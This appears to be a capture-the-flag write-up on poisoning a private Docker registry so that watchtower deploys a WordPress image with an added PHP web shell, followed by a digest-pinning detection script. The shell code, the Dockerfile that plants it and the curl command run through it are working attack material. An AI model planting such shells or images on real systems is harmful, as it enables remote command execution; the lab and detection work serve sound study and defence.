Corrupting Source Image – Docker

Hello friends! In this post I'll share how I solved the PentesterAcademy "Corrupting Source Image – Docker" lab.

Scenario: The target Docker server is running a webserver image that is serving on port 80. The Docker image used for the webserver is stored in an unprotected private Docker registry present on the same network. A watchtower instance deployed on the target server ensures that the latest image present in the private repository is always used for the webserver container. A flag is mounted from the host machine into the /tmp directory of the webserver container.

The /etc/hosts file contains entries for targetserver and registry; registry:5000 is the private registry where all the images are stored.

A curl to targetserver on port 80 reveals that it is running a WordPress website.

If we check the images available in the registry, we find four images, including WordPress.

Let's pull the WordPress image from registry:5000.

Then we run this image in detached mode and attach to it interactively.

Looking in the /tmp folder, we don't find the flag there. So instead we create a modified WordPress Docker image with a web shell added to it.

Create shell.php and a Dockerfile, then build the image.

root@localhost# vim shell.php

<?php
// minimal web shell: runs the value of the ?cmd= parameter and echoes its output
$result = shell_exec($_GET["cmd"]);
echo $result;
?>

root@localhost# vim Dockerfile

# start from the WordPress image stored in the unprotected private registry
FROM registry:5000/wordpress

# drop the web shell into the image's web root
COPY shell.php /app/

# make the web root world-writable
RUN chmod 777 /app

Now our web shell is baked into the new WordPress image. We wait a few minutes for watchtower to auto-deploy it; after 2-3 minutes, a curl to targetserver with the id command returns a reply.

root@localhost# curl "targetserver/shell.php?cmd=id"

Now, if we ls /tmp through it, we can see the flag.
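The root cause in this lab is that watchtower deploys whatever the registry serves for a tag, and the registry accepts pushes from anyone on the network. The following Python script is an added example for this write-up, not part of the lab or the original post: it pins the content digest of each approved repo:tag, compares it with what the registry currently serves, and reports drift; it also diffs the build history of a rebuilt image against the approved one so the added layers are visible. The registry address, repo names, digests and history entries are constructed sample values, and `fetch_tag_digest` (a Registry v2 API HEAD request) is only there for use against a live registry and is not exercised offline.

```python
"""Detect tampering of images in a private Docker registry by pinning digests.

Added example, not code from the lab or the post. Assumes a Docker Registry v2
API and uses constructed sample data so it runs offline.
"""
from __future__ import annotations

import re
import urllib.request

# Manifest media types a v2 registry may return; needed so the HEAD request gets
# the same digest that `docker pull` would resolve.
MANIFEST_TYPES = ", ".join([
    "application/vnd.docker.distribution.manifest.v2+json",
    "application/vnd.docker.distribution.manifest.list.v2+json",
    "application/vnd.oci.image.manifest.v1+json",
    "application/vnd.oci.image.index.v1+json",
])
DIGEST_RE = re.compile(r"^sha256:[0-9a-f]{64}$")


def fetch_tag_digest(registry: str, repo: str, tag: str, scheme: str = "http") -> str:
    """Return the Docker-Content-Digest for repo:tag from a live registry.
    Network call (e.g. registry="registry:5000"); not used by the offline demo."""
    url = f"{scheme}://{registry}/v2/{repo}/manifests/{tag}"
    req = urllib.request.Request(url, method="HEAD", headers={"Accept": MANIFEST_TYPES})
    with urllib.request.urlopen(req, timeout=10) as resp:
        return resp.headers["Docker-Content-Digest"]


def compare_digests(observed: dict[str, str], pinned: dict[str, str]) -> dict[str, list[str]]:
    """Classify every 'repo:tag' seen in either mapping.

    ok       - served digest matches the pinned one
    tampered - served digest differs from the pinned one (or is malformed)
    unpinned - registry serves a tag nobody approved
    missing  - an approved tag is no longer served
    """
    report: dict[str, list[str]] = {"ok": [], "tampered": [], "unpinned": [], "missing": []}
    for ref in sorted(set(observed) | set(pinned)):
        if ref not in pinned:
            report["unpinned"].append(ref)
        elif ref not in observed:
            report["missing"].append(ref)
        elif not DIGEST_RE.match(observed[ref]) or observed[ref] != pinned[ref]:
            report["tampered"].append(ref)
        else:
            report["ok"].append(ref)
    return report


def new_layer_commands(observed_history: list[dict], pinned_history: list[dict]) -> list[str]:
    """Return the build steps (image config 'history[].created_by') present in the
    served image but not in the approved one. If the served history does not start
    with the approved history, the image was not merely extended, so every step is
    reported for review."""
    obs = [h.get("created_by", "") for h in observed_history]
    base = [h.get("created_by", "") for h in pinned_history]
    if obs[: len(base)] == base:
        return obs[len(base):]
    return obs


# --- constructed sample data (not real digests or registry contents) ---
PINNED = {
    "wordpress:latest": "sha256:" + "a1" * 32,
    "nginx:latest": "sha256:" + "b2" * 32,
}
OBSERVED = {
    "wordpress:latest": "sha256:" + "c3" * 32,    # tag now points at a rebuilt image
    "nginx:latest": "sha256:" + "b2" * 32,
    "debug-tools:latest": "sha256:" + "d4" * 32,  # pushed by an unknown party
}
PINNED_HISTORY = [
    {"created_by": "/bin/sh -c #(nop) ADD file:base-rootfs in /"},
    {"created_by": '/bin/sh -c #(nop)  CMD ["apache2-foreground"]', "empty_layer": True},
]
OBSERVED_HISTORY = PINNED_HISTORY + [
    {"created_by": "/bin/sh -c #(nop) COPY file:shell in /app/"},
    {"created_by": "/bin/sh -c chmod 777 /app"},
]


def main() -> None:
    report = compare_digests(OBSERVED, PINNED)
    for category, refs in report.items():
        print(f"{category:9s} {refs}")
    for step in new_layer_commands(OBSERVED_HISTORY, PINNED_HISTORY):
        print("added build step:", step)


if __name__ == "__main__":
    main()
```

Run this from the deploy host (or a cron job) before trusting what watchtower has rolled out; a `tampered` or `unpinned` entry is the signal to stop the rollout and inspect the image. The durable fix for the lab's weakness is to require authentication and TLS on the registry and to deploy by digest rather than by mutable tag, so a re-pushed `latest` cannot silently change what runs.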

If you face any problems with this challenge, let me know in the comment section.
